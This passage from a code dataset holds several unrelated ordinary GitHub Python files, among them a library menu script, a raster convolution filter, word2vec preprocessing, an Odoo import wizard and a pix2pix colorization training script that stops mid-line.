Book','Avengers','Python Notes']\n\nme=student()\n\n\nwhile(True):\n print('=====Welcome to Central Library======')\n print('''\n 1.look for the available books\n 2.Borrow a book\n 3.Return a book\n 4.Donate a book\n 5.Exit\n ''')\n \n choice=int(input('Please Enter your choice : '))\n\n if choice==1:\n print('Book present in library are : ')\n for item,i in enumerate(central_library.lib):\n print('*'+i)\n \n elif choice==2:\n bookname=input('Enter the name of book to borrow : ')\n central_library.lib.remove(bookname)\n central_library.borrowbook(bookname)\n \n elif choice==3:\n bookname=input('Enter the name of book to return : ')\n central_library.lib.append(bookname)\n me.returnbook(bookname)\n\n elif choice==4: \n bookname=input('Enter the name of book to donate : ')\n central_library.lib.append(bookname)\n print('Thanks For Donation!! , Have a great day ahead')\n\n elif choice==5:\n break\n\n else:\n print('Invalid Choice , Please follow the menu list!!!')","repo_name":"HarshalAtre/My-codes","sub_path":"python/project 3/Students library.py","file_name":"Students library.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37880102466","text":"import inspect\r\nimport traceback\r\nfrom math import ceil\r\nfrom typing import Dict, Any, List, Tuple\r\n\r\nimport numpy as np\r\n\r\nfrom enmapboxprocessing.driver import Driver\r\nfrom enmapboxprocessing.enmapalgorithm import EnMAPProcessingAlgorithm, Group\r\nfrom enmapboxprocessing.rasterreader import RasterReader\r\nfrom enmapboxprocessing.utils import Utils\r\nfrom qgis.core import (QgsProcessingContext, QgsProcessingFeedback, Qgis)\r\nfrom enmapbox.typeguard import typechecked\r\n\r\n\r\n@typechecked\r\nclass ConvolutionFilterAlgorithmBase(EnMAPProcessingAlgorithm):\r\n P_RASTER, _RASTER = 'raster', 'Raster layer'\r\n P_KERNEL, _KERNEL = 'kernel', 'Kernel'\r\n P_NORMALIZE, _NORMALIZE = 'normalize', 'Normalize kernel'\r\n P_INTERPOLATE, _INTERPOLATE = 'interpolate', 'Interpolate no data pixel'\r\n P_OUTPUT_RASTER, _OUTPUT_RASTER = 'outputRaster', 'Output raster layer'\r\n\r\n def helpParameters(self) -> List[Tuple[str, str]]:\r\n return [\r\n (self._RASTER, 'Raster layer to be filtered.'),\r\n (self._KERNEL, self.helpParameterCode()),\r\n (self._NORMALIZE, 'Whether to normalize the kernel to have a sum of one.'),\r\n (self._INTERPOLATE, 'Whether to interpolate no data pixel. '\r\n 'Will result in renormalization of the kernel at each position ignoring '\r\n 'pixels with no data values.'),\r\n (self._OUTPUT_RASTER, self.RasterFileDestination)\r\n ]\r\n\r\n def displayName(self) -> str:\r\n raise NotImplementedError()\r\n\r\n def shortDescription(self) -> str:\r\n raise NotImplementedError()\r\n\r\n def code(self):\r\n raise NotImplementedError()\r\n\r\n def helpParameterCode(self) -> str:\r\n raise NotImplementedError()\r\n\r\n def group(self):\r\n return Group.ConvolutionMorphologyAndFiltering.value\r\n\r\n def normalizeByDefault(self) -> bool:\r\n return False\r\n\r\n def interpolateByDefault(self) -> bool:\r\n return True\r\n\r\n def initAlgorithm(self, configuration: Dict[str, Any] = None):\r\n self.addParameterRasterLayer(self.P_RASTER, self._RASTER)\r\n self.addParameterCode(self.P_KERNEL, self._KERNEL, self.defaultCodeAsString())\r\n self.addParameterBoolean(self.P_NORMALIZE, self._NORMALIZE, self.normalizeByDefault(), False, True)\r\n self.addParameterBoolean(self.P_INTERPOLATE, self._INTERPOLATE, self.interpolateByDefault(), False, True)\r\n self.addParameterRasterDestination(self.P_OUTPUT_RASTER, self._OUTPUT_RASTER)\r\n\r\n def defaultCodeAsString(self):\r\n try:\r\n lines = [line[8:] for line in inspect.getsource(self.code).split('\\n')][1:-2]\r\n except OSError:\r\n lines = ['']\r\n lines = '\\n'.join(lines)\r\n return lines\r\n\r\n def parameterAsKernel(self, parameters: Dict[str, Any], name, context: QgsProcessingContext):\r\n namespace = dict()\r\n code = self.parameterAsString(parameters, name, context)\r\n exec(code, namespace)\r\n kernel = namespace['kernel']\r\n return kernel\r\n\r\n def checkParameterValues(self, parameters: Dict[str, Any], context: QgsProcessingContext) -> Tuple[bool, str]:\r\n valid, message = super().checkParameterValues(parameters, context)\r\n if not valid:\r\n return valid, message\r\n # check code\r\n try:\r\n from astropy.convolution import Kernel\r\n kernel = self.parameterAsKernel(parameters, self.P_KERNEL, context)\r\n assert isinstance(kernel, Kernel)\r\n assert 1 <= kernel.dimension <= 3\r\n except Exception:\r\n return False, traceback.format_exc()\r\n return True, ''\r\n\r\n def processAlgorithm(\r\n self, parameters: Dict[str, Any], context: QgsProcessingContext, feedback: QgsProcessingFeedback\r\n ) -> Dict[str, Any]:\r\n raster = self.parameterAsRasterLayer(parameters, self.P_RASTER, context)\r\n kernel = self.parameterAsKernel(parameters, self.P_KERNEL, context)\r\n normalize_kernel = self.parameterAsBoolean(parameters, self.P_NORMALIZE, context)\r\n if self.parameterAsBoolean(parameters, self.P_INTERPOLATE, context):\r\n nan_treatment = 'interpolate'\r\n else:\r\n nan_treatment = 'fill'\r\n filename = self.parameterAsOutputLayer(parameters, self.P_OUTPUT_RASTER, context)\r\n maximumMemoryUsage = Utils.maximumMemoryUsage()\r\n\r\n with open(filename + '.log', 'w') as logfile:\r\n from astropy.convolution import convolve, CustomKernel\r\n feedback, feedback2 = self.createLoggingFeedback(feedback, logfile)\r\n self.tic(feedback, parameters, context)\r\n\r\n feedback.pushInfo(f'Filter kernel {list(kernel.array.shape)}: {kernel.array.tolist()}')\r\n if kernel.dimension == 3:\r\n pass\r\n elif kernel.dimension == 2:\r\n kernel = CustomKernel(array=kernel.array[None])\r\n elif kernel.dimension == 1:\r\n kernel = CustomKernel(array=kernel.array.reshape(-1, 1, 1))\r\n\r\n zsize, ysize, xsize = kernel.shape\r\n overlap = int((max(ysize, xsize) + 1) / 2.)\r\n\r\n feedback.pushInfo('Convolve raster')\r\n rasterReader = RasterReader(raster)\r\n writer = Driver(filename, feedback=feedback).createLike(rasterReader, Qgis.Float32)\r\n lineMemoryUsage = rasterReader.lineMemoryUsage(dataTypeSize=Qgis.Float32)\r\n lineMemoryUsage *= 2 # output has same size\r\n blockSizeY = min(raster.height(), ceil(maximumMemoryUsage / lineMemoryUsage))\r\n blockSizeX = raster.width()\r\n for block in rasterReader.walkGrid(blockSizeX, blockSizeY, feedback):\r\n feedback.setProgress(block.yOffset / rasterReader.height() * 100)\r\n array = rasterReader.arrayFromBlock(block, overlap=overlap)\r\n mask = rasterReader.maskArray(array)\r\n outarray = convolve(\r\n array, kernel, fill_value=np.nan, nan_treatment=nan_treatment,\r\n normalize_kernel=normalize_kernel, mask=np.logical_not(mask)\r\n )\r\n noDataValue = float(np.finfo(np.float32).min)\r\n outarray[np.isnan(outarray)] = noDataValue\r\n writer.writeArray(outarray, block.xOffset, block.yOffset, overlap=overlap)\r\n\r\n writer.setMetadata(rasterReader.metadata())\r\n writer.setNoDataValue(noDataValue)\r\n for i in range(rasterReader.bandCount()):\r\n writer.setBandName(rasterReader.bandName(i + 1), i + 1)\r\n\r\n result = {self.P_OUTPUT_RASTER: filename}\r\n self.toc(feedback, result)\r\n\r\n return result\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapboxprocessing/algorithm/convolutionfilteralgorithmbase.py","file_name":"convolutionfilteralgorithmbase.py","file_ext":"py","file_size_in_byte":6726,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"6061071718","text":"import utils\nfrom collections import Counter\nimport random\nimport numpy as np\n\n\ndef preprocess(text):\n # get list of words\n words = utils.preprocess(text)\n\n vocab_to_int, int_to_vocab = utils.create_lookup_tables(words)\n int_words = [vocab_to_int[word] for word in words]\n\n ## Subsampling\n threshold = 1e-5\n word_counts = Counter(int_words)\n # print(list(word_counts.items())[0]) # dictionary of int_words, how many times they appear\n\n total_count = len(int_words)\n freqs = {word: count / total_count for word, count in word_counts.items()}\n p_drop = {word: 1 - np.sqrt(threshold / freqs[word]) for word in word_counts}\n # discard some frequent words, according to the subsampling equation\n # create a new list of words for training\n train_words = [word for word in int_words if random.random() < (1 - p_drop[word])]\n\n preprocessed = {'train_words': train_words,\n 'vocab_to_int': vocab_to_int,\n 'int_to_vocab': int_to_vocab,\n 'freqs': freqs}\n return preprocessed\n\n\n# Get nearby elements for a given index\ndef get_target(words, idx, window_size=5):\n ''' Get a list of words in a window around an index. '''\n\n R = np.random.randint(1, window_size + 1)\n start = idx - R if (idx - R) > 0 else 0\n stop = idx + R\n target_words = words[start:idx] + words[idx + 1:stop + 1]\n\n return list(target_words)\n\n\n# Get batches\ndef get_batches(words, batch_size, window_size=5):\n ''' Create a generator of word batches as a tuple (inputs, targets) '''\n\n n_batches = len(words) // batch_size\n\n # only full batches\n words = words[:n_batches * batch_size]\n\n for idx in range(0, len(words), batch_size):\n x, y = [], []\n batch = words[idx:idx + batch_size]\n for ii in range(len(batch)):\n batch_x = batch[ii]\n batch_y = get_target(batch, ii, window_size)\n y.extend(batch_y)\n x.extend([batch_x] * len(batch_y))\n yield x, y\n","repo_name":"madhumitajadhav/Word2Vec","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6443336770","text":"SERVER_HOST = \"busrpc.server.host\"\nSERVER_NAME = \"busrpc.server.name\"\nINSTANCE_NAME = \"busrpc.instance\"\n\ndef _parse_name_value(line):\n parts = line.split(\"=\")\n if len(parts) < 2:\n return None, None\n return parts[0], parts[1]\n\nclass DeploymentConfig:\n\n \"\"\" Parses service deployment config files\"\"\"\n\n def __init__(self, filename):\n self.instances = {}\n self.server_name = None\n self.server_host = None\n self.config_values = {}\n f = None\n try:\n f = open(filename, \"r\")\n for line in f:\n self.parse(line)\n finally:\n if not f == None:\n f.close()\n\n def parse(self, line):\n line = line.replace(\"\\n\", \"\")\n if line.startswith(\"#\"):\n pass\n if len(line.strip()) == 0:\n pass\n name, value = _parse_name_value(line)\n if name == None:\n return\n if name == SERVER_NAME:\n self.server_name = value.replace(\"\\\"\", \"\")\n elif name == SERVER_HOST:\n self.server_host = value.replace(\"\\\"\", \"\")\n elif name.startswith(INSTANCE_NAME):\n name = name[len(INSTANCE_NAME) + 1:]\n self.instances[name] = value\n else:\n self.config_values[name] = value\n\n def get_value(self, entry_name, default=None):\n if self.config_values.has_key(entry_name):\n return self.config_values[entry_name]\n else:\n return default\n\n def get_value_list(self, entry_name, default=None):\n value = self.get_value(entry_name, default=default)\n if not value == None:\n return value.split(',')\n else:\n return default\n\n def get_value_number(self, entry_name, default=None):\n value = self.get_value(entry_name, default=default)\n if not value == None and not value == \"\":\n try:\n return int(value)\n except ValueError:\n return float(value)\n else:\n return value\n","repo_name":"mpdehaan/virt-factory","sub_path":"common/busrpc/busrpc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"38792967418","text":"# coding: utf-8\n\nimport ui\nfrom objc_util import *\nUIScreen = ObjCClass('UIScreen')\n\nv = ui.load_view()\nv.present('sheet',hide_title_bar=True)\n\t\ndef main():\n\tscreen = UIScreen.mainScreen()\n\twhile v.on_screen:\n\t\tscreen.setBrightness_(v['view1']['slider1'].value)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"LokiPlush1/Loki","sub_path":"Projects/UI/Brightness Slider/brightness_slider.py","file_name":"brightness_slider.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16395787922","text":"from random import randint\nfrom time import sleep\nc = randint(1,10)\nsoma = 1\nprint('=' * 100)\nprint('VOU PENSAR EM UM NÚMERO INTEIRO ENTRE 1 E 10: ')\nprint('PENSANDO....')\nsleep(3)\njogador = int(input('VOCÊ CONSEGUE ADVINAR EM QUAL NÚMERO EU PENSEI? '))\nwhile jogador != c:\n jogador = int(input(('Ainda não foi desta vez, tente denovo: ').upper()))\n soma += 1\n while jogador <1 or jogador > 10:\n jogador = int(input('Não se esqueça que o número está entre 1 e 10, tente denovo:').upper())\nif soma == 1:\n print(('Uowwwwwww!!! Você advinhou de primeira parabêns!!!').upper())\nelif soma < 3:\n print((f'Parabêns você só precisou de {soma} palpites para acertar !!!').upper())\nelif soma < 6:\n print((f'Parabêns você acertou! E precisou de {soma} palpites para acertar').upper())\nelif soma <=9:\n print((f'Demorou mais você conseguiu, você precisou de {soma} palpites para acertar').upper())\nelse:\n print((f'Você acertou, mas depois de chutar todos os números ficou fácil não é mesmo!').upper())\nprint('=' * 100)","repo_name":"Thiago-Mauricio/Curso-de-python","sub_path":"Curso em Video/Aula14 Estrutura de Repetição While/Ex_058 Jogo da Advinhação v2.0.py","file_name":"Ex_058 Jogo da Advinhação v2.0.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12367356984","text":"from odoo import _, api, fields, models\nfrom odoo.models import expression\nfrom odoo.exceptions import ValidationError\nfrom odoo.tools.safe_eval import safe_eval\nimport base64\n\ntry:\n import xlrd\n try:\n from xlrd import xlsx\n except ImportError:\n xlsx = None\nexcept ImportError:\n xlrd = xlsx = None\n\n\nclass UpdateEducationResPartner(models.TransientModel):\n _name = \"update.education.partner\"\n _description = \"Wizard to Update Partner Education Code\"\n\n file = fields.Binary(\n string=\"Student Information File\", filters=\"*.xls\")\n file_line_ids = fields.One2many(\n comodel_name=\"update.education.partner.line\", inverse_name=\"wizard_id\",\n string=\"Lines\")\n partner_line_ids = fields.One2many(\n comodel_name=\"update.education.partner.line\", inverse_name=\"wizard_id\",\n string=\"Partner Lines\", domain=[(\"partner_id\", \"!=\", False)])\n missing_partner_line_ids = fields.One2many(\n comodel_name=\"update.education.partner.line\", inverse_name=\"wizard_id\",\n string=\"Missing Partner Lines\",\n domain=[(\"missing_partner\", \"=\", True)])\n duplicated_partner_line_ids = fields.One2many(\n comodel_name=\"update.education.partner.line\", inverse_name=\"wizard_id\",\n string=\"Duplicated Partner Lines\",\n domain=[(\"duplicated_partner\", \"=\", True)])\n partner_count = fields.Integer(\n compute=\"_compute_partner_count\", store=True)\n missing_partner_count = fields.Integer(\n compute=\"_compute_partner_count\", store=True)\n duplicated_partner_count = fields.Integer(\n compute=\"_compute_partner_count\", store=True)\n\n @api.depends(\"file_line_ids\")\n def _compute_partner_count(self):\n for wizard in self:\n wizard.partner_count = len(\n wizard.file_line_ids.filtered(\"partner_id\"))\n wizard.missing_partner_count = len(\n wizard.file_line_ids.filtered(\"missing_partner\"))\n wizard.duplicated_partner_count = len(\n wizard.file_line_ids.filtered(\"duplicated_partner\"))\n\n @api.multi\n def upload_file(self):\n self.ensure_one()\n if self.file:\n self.file_line_ids.unlink()\n book = base64.decodestring(self.file)\n reader = xlrd.open_workbook(file_contents=book)\n try:\n sheet = reader.sheet_by_name(\"Modulos-Matricula-Alumno\")\n line_obj = self.env[\"update.education.partner.line\"]\n keys = [c.value for c in sheet.row(1)]\n for counter in range(2, sheet.nrows-1):\n row_values = sheet.row_values(\n counter, 0, end_colx=sheet.ncols)\n values = dict(zip(keys, row_values))\n line_data = {\n \"wizard_id\": self.id,\n \"student_education_code\":\n values.get(\"COD_ALU\").zfill(10),\n \"student_document\": values.get(\"DOCU_IDENTI_ALU\"),\n \"student_lastname1\": values.get(\"APELLIDO_1_ALU\"),\n \"student_lastname2\": values.get(\"APELLIDO_2_ALU\"),\n # There are 2 columns with key NOMBRE_ALU\n \"student_name\": row_values[11],\n }\n line_obj.find_or_create(line_data)\n except Exception:\n raise ValidationError(_(\"This is not a valid file.\"))\n\n @api.multi\n def button_update_education_code(self):\n self.mapped(\"file_line_ids\").button_update_education_code()\n\n @api.multi\n def button_update_vat(self):\n self.mapped(\"file_line_ids\").button_update_vat()\n\n @api.multi\n def button_update_education_code_and_vat(self):\n self.mapped(\"file_line_ids\").button_update_education_code_and_vat()\n\n\nclass UpdateEducationResPartnerLine(models.TransientModel):\n _name = \"update.education.partner.line\"\n _description = \"Wizard Lines to Update Partner Education Code\"\n _order = \"student_lastname1, student_lastname2, student_name\"\n\n wizard_id = fields.Many2one(\n comodel_name=\"update.education.partner\", string=\"Wizard\",\n required=True)\n student_education_code = fields.Char(\n string=\"Student Education Code\", required=True)\n student_document = fields.Char(string=\"ID Document\")\n student_lastname1 = fields.Char(string=\"Student Last Name\", required=True)\n student_lastname2 = fields.Char(string=\"Student Second Last Name\")\n student_name = fields.Char(string=\"Student First Name\", required=True)\n partner_id = fields.Many2one(\n comodel_name=\"res.partner\", compute=\"_compute_partner\",\n string=\"Partner\", store=True)\n missing_partner = fields.Boolean(\n compute=\"_compute_partner\", store=True)\n duplicated_partner = fields.Boolean(\n compute=\"_compute_partner\", store=True)\n education_code = fields.Char(\n related=\"partner_id.education_code\", string=\"Partner Education Code\")\n vat = fields.Char(\n related=\"partner_id.vat\", string=\"Partner Tax ID\")\n\n @api.depends(\"student_document\", \"student_lastname1\", \"student_lastname2\",\n \"student_name\", \"student_education_code\")\n def _compute_partner(self):\n for line in self:\n partners = line._find_partner_ids()\n if len(partners) > 1:\n partners = (\n partners.filtered(\n lambda p: p.education_code ==\n line.student_education_code)\n or partners.filtered(lambda p: not p.education_code))\n line.missing_partner = (len(partners) == 0)\n line.duplicated_partner = (len(partners) > 1)\n line.partner_id = partners[:1] if len(partners) == 1 else False\n\n def _find_partner_ids(self):\n self.ensure_one()\n partners = partner_obj = self.env[\"res.partner\"]\n if self.student_document:\n partners = partner_obj.search([\n (\"vat\", \"ilike\", self.student_document)])\n if not partners:\n partners = partner_obj.search([\n (\"lastname\", \"=ilike\", self.student_lastname1.encode(\"utf-8\")),\n (\"lastname2\", \"=ilike\",\n self.student_lastname2.encode(\"utf-8\")),\n (\"firstname\", \"=ilike\", self.student_name.encode(\"utf-8\")),\n ])\n if not partners:\n partners = partner_obj.search([\n (\"education_code\", \"ilike\", self.student_education_code[:-1]),\n ])\n return partners\n\n def find_or_create(self, values):\n line = self.search([\n (\"wizard_id\", \"=\", values[\"wizard_id\"]),\n (\"student_education_code\", \"=\", values[\"student_education_code\"]),\n (\"student_document\", \"=\", values[\"student_document\"]),\n (\"student_lastname1\", \"=\", values[\"student_lastname1\"]),\n (\"student_lastname2\", \"=\", values[\"student_lastname2\"]),\n (\"student_name\", \"=\", values[\"student_name\"]),\n ])\n if not line:\n self.create(values)\n\n @api.multi\n def button_update_education_code(self):\n for line in self.filtered(\"partner_id\"):\n line.partner_id.education_code = line.student_education_code\n\n @api.multi\n def button_update_vat(self):\n for line in self.filtered(\n lambda l: l.partner_id and l.student_document):\n try:\n line.partner_id.vat = \"ES{}\".format(line.student_document)\n except Exception:\n pass\n\n @api.multi\n def button_update_education_code_and_vat(self):\n self.button_update_education_code()\n self.button_update_vat()\n return True\n\n @api.multi\n def button_show_partners(self):\n self.ensure_one()\n partners = self._find_partner_ids()\n action = self.env.ref(\"contacts.action_contacts\")\n action_dict = action.read()[0] if action else {}\n domain = expression.AND([\n [(\"id\", \"in\", partners.ids)],\n safe_eval(action.domain or \"[]\")])\n action_dict.update({\"domain\": domain})\n return action_dict\n","repo_name":"avanzosc/education","sub_path":"hezkuntza/wizard/update_education_partner.py","file_name":"update_education_partner.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"41255944777","text":"#Problem 334 - Increasing Triplet Subsequence\n\nclass Solution:\n def increasingTriplet(self, nums: List[int]) -> bool:\n if len(nums) == 0:\n return False\n \n min_till_now = nums[0]\n target = None\n i=1\n while i < len(nums):\n if target != None and nums[i]>target:\n return True\n elif nums[i] > min_till_now:\n target = target if (target != None) and target < nums[i] else nums[i]\n print(target)\n else:\n min_till_now = nums[i] \n i += 1\n return False\n","repo_name":"MahirJhaveri/CompetitiveProgramming","sub_path":"LeetCode/Problem_334.py","file_name":"Problem_334.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"3740925109","text":"from gnes.router.base import BaseRouter\nfrom gnes.proto import gnes_pb2\nfrom gnes.service.base import BlockMessage\nfrom typing import List\n\n\nclass BlockRouter(BaseRouter):\n \"\"\" :param block: runtimes to block\"\"\"\n\n def __init__(self, block: List[str] = [], *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.block = block\n\n def apply(self, msg: 'gnes_pb2.Message', *args, **kwargs):\n \"\"\"\n Log the incoming message\n :param msg: incoming message\n \"\"\"\n\n runtime = getattr(msg, msg.WhichOneof('body')).WhichOneof('body')\n self.logger.error(runtime)\n\n if runtime in self.block:\n self.logger.info('Blocking %s msg...' % runtime)\n raise BlockMessage\n","repo_name":"koursaros-ai/microservices","sub_path":"koursaros/hub/router/block/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"1447928670","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 29 14:30:23 2018\r\n\r\n@author: Student\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sklearn\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n\r\ntrain_data = pd.read_csv(\"C:\\\\Users\\\\Student\\\\Desktop\\\\applied\\\\train_data.csv\")\r\ntest_data = pd.read_csv(\"C:\\\\Users\\\\Student\\\\Desktop\\\\applied\\\\test_data.csv\")\r\n\r\nlabel_Y = np.array(train_data['y'])\r\n\r\n#classification based on termfrequency matrix\r\n\r\nNew_f3 = [train_data['f3'],test_data['f3']];\r\nFinal_doc = pd.concat(New_f3)\r\ndel New_f3\r\nTF_IDF = TfidfVectorizer()\r\nfeature_matrix = TF_IDF.fit_transform(Final_doc)\r\ndel Final_doc\r\n\r\nTF_idf_train = feature_matrix[0:2656,:]\r\nTF_idf_test = feature_matrix[2656:3321,:]\r\n\r\n\r\n\r\n#sorting of cloumn based on their means\r\nsorted_tfidf_index = np.array(TF_idf_train.mean(0)).reshape(153070,)\r\nsorted_tfidf_index = sorted_tfidf_index.argsort()\r\nnew_tf_idf = TF_idf_train[:,sorted_tfidf_index[-10000:-1]]\r\n\r\nsorted_tfidf_index_test = np.array(TF_idf_test.mean(0)).reshape(153070,)\r\nsorted_tfidf_index_test = sorted_tfidf_index_test.argsort()\r\n#taking first 10000 features\r\nnew_tf_idf_test = TF_idf_test[:,sorted_tfidf_index_test[-10000:-1]]\r\n\r\nclf = LogisticRegression(solver='lbfgs',C=10)\r\n\r\nclf.fit(new_tf_idf,label_Y)\r\n\r\n\r\n\r\ny_proba = clf.predict_proba(new_tf_idf_test )\r\n\r\ny_df = pd.DataFrame(y_proba) #label_Y_test is an array\r\ny_df.index += 1\r\ny_df.to_csv('mlclassificationresultsprediction2.csv')\r\n\r\n","repo_name":"manojgali/Document_Classification","sub_path":"logisticclassifier.py","file_name":"logisticclassifier.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37343054815","text":"import imageio\n\n# I haven't tested this yet. It is based on:\n# https://www.youtube.com/watch?v=Uv25CLHuNHU\n\n\n# Files for frames\n#\n# To double the duration of a frame,\n# try including it twice\nfilenames = []\n\noutfile_name = \"\"\nseconds_per_frame = 1\n\n\n\nimages = []\nfor filename in filenames:\n\timages.append(imageio.imread(filename))\n\n\nimageio.mimsave(outfile_name, images, \"GIF\", duration=seconds_per_frame)\n\n","repo_name":"Rybec/useful-scripts","sub_path":"python/animated_gif.py","file_name":"animated_gif.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71771608485","text":"import functools\nimport numpy as np\n\n\ndef lazy_property(func):\n attribute = '_cache_' + func.__name__\n\n @property\n @functools.wraps(func)\n def decorator(self):\n if not hasattr(self, attribute):\n setattr(self, attribute, func(self))\n return getattr(self, attribute)\n\n return decorator\n\n\ndef padding_batch_documents(lst):\n sentence_max_len = max([max([len(sen) for sen in doc]) for doc in lst])\n sentence_max_num = max(map(len, lst))\n result = np.zeros([len(lst), sentence_max_num, sentence_max_len], dtype=np.int32)\n for i, row in enumerate(lst):\n for j, col in enumerate(row):\n for k, val in enumerate(col):\n result[i][j][k] = val\n return result\n\n\ndef decode_batch(data):\n x = []\n y = []\n for datum in data:\n label_sentences = datum.decode().split(':')\n label = int(label_sentences[0])\n sentences = label_sentences[1].split('#')\n sentences = [[int(word) for word in sen.split(',')] for sen in sentences]\n x.append(sentences)\n y.append([0, 1] if label == 1 else [1, 0])\n return padding_batch_documents(x), y\n\n\ndef decode(datum):\n x = []\n y = []\n label_sentences = datum.decode().split(':')\n label = int(label_sentences[0])\n sentences = label_sentences[1].split('#')\n sentences = [[int(word) for word in sen.split(',')] for sen in sentences]\n x.append(sentences)\n y.append([0, 1] if label == 1 else [1, 0])\n return padding_batch_documents(x), y\n","repo_name":"Carl-Xie/HAN-Tensorflow","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"37098461098","text":"from todo_list.app import db\n\n\nclass AddUpdateDelete():\n def add(self, resource):\n db.session.add(resource)\n return db.session.commit()\n\n def update(self):\n return db.session.commit()\n\n def delete(self, resource):\n db.session.delete(resource)\n return db.session.commit()\n\n\nclass Task(db.Model, AddUpdateDelete):\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.String(250), unique=True, nullable=False)\n creation_date = db.Column(db.TIMESTAMP, server_default=db.func.current_timestamp(), nullable=False)\n completed = db.Column(db.Boolean, nullable=False, server_default='false')\n\n def __init__(self, content, creation_date):\n self.id = 0 # We will automatically generate the new id\n self.content = content\n self.creation_date = creation_date\n self.completed = False\n","repo_name":"lukasz-f/To-Do-List","sub_path":"todo_list_app/todo_list/models/db/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10713055497","text":"import os, re, torch\r\nimport torch.optim as optim\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport torchvision.utils as vutils\r\nfrom torch import nn\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nfrom tqdm import tqdm\r\nfrom torchvision.utils import save_image\r\nfrom PIL import Image\r\nfrom torchvision import transforms\r\nfrom skimage.color import rgb2gray\r\nfrom shutil import copytree, copy\r\nfrom pix import rgb_to_lab, lab_to_rgb\r\nfrom pix_pytorch import make_dataloaders\r\nfrom pix2pix_model import Generator, Discriminator, init_weights, DiscriminatorLoss\r\nfrom tqdm import tqdm\r\n\r\n# parameters related to the images, model and training\r\nIM_SIZE = 256\r\nCROP_SIZE = 256\r\nBATCH_SIZE = 64\r\n\r\nMODEL = 'Pix2Pix_RGB'\r\n\r\n# dataset directory\r\ndir = 'data/coco/train2014/class/'\r\n\r\n# directories to save logs and checkpoints to restart training\r\ndir_summary = 'checkpoints_colorizer_3'\r\ndir_model = os.path.join(dir_summary, MODEL)\r\nlog_path = os.path.join(dir_model, 'logs')\r\ncheckpoint_dir = 'checkpoints_colorizer'\r\n\r\n# directories to save images during training\r\nimg_dir = os.path.join(dir_model, 'images_' + str(BATCH_SIZE))\r\nimg_train = os.path.join(img_dir, 'from_training')\r\nimg_test = os.path.join(img_dir, 'from_test')\r\n\r\ndevice = 'cuda'\r\n\r\n\r\ndef lab_to_rgb_pytorch(L, ab):\r\n \"\"\"lab_to_rgb takes a numpy stack [B, H, W ,C] as input and\r\n return a numpy stack in the same format\"\"\"\r\n L = L.permute(0, 2, 3, 1).cpu().numpy()\r\n ab = ab.permute(0, 2, 3, 1).detach().cpu().numpy()\r\n return torch.from_numpy(lab_to_rgb(L, ab)).permute(0, 3, 1, 2)\r\n\r\n\r\ngenerator = make_dataloaders(batch_size=BATCH_SIZE, im_size=IM_SIZE, crop_size=CROP_SIZE, split='Train',\r\n paths='data/coco/train2014', n_workers=0)\r\ntrack_train = make_dataloaders(batch_size=5, im_size=IM_SIZE, crop_size=CROP_SIZE, split='Test',\r\n paths='data/coco/val2014', n_workers=0, shuffle=False)\r\ntrack_test = make_dataloaders(batch_size=5, im_size=IM_SIZE, crop_size=CROP_SIZE, split='Test', paths='data/coco/test2014',\r\n n_workers=0, shuffle=False)\r\n\r\nnet_G = Generator(3).to(device)\r\nnet_D = Discriminator().to(device)\r\n\r\nopt_G = optim.Adam(net_G.parameters(), lr=2e-4, betas=(0.5, 0.999))\r\nopt_D = optim.Adam(net_D.parameters(), lr=2e-4, betas=(0.5, 0.999))\r\n\r\n# load the latest model if it finds checkpoint files in the checkpoint directory\r\nif os.listdir(checkpoint_dir):\r\n nums = [int(re.split('\\-|\\.', f)[1]) for f in os.listdir(checkpoint_dir) if f.endswith('.pth')]\r\n cpkt = torch.load(os.path.join(checkpoint_dir, 'cp-'+str(max(nums))+'.pth'), map_location=device)\r\n net_G.load_state_dict(cpkt['G_state_dict'])\r\n net_D.load_state_dict(cpkt['D_state_dict'])\r\n opt_G.load_state_dict(cpkt['optimizerG_state_dict'])\r\n opt_D.load_state_dict(cpkt['optimizerD_state_dict'])\r\n epoch = cpkt['epoch']\r\n loss_G = 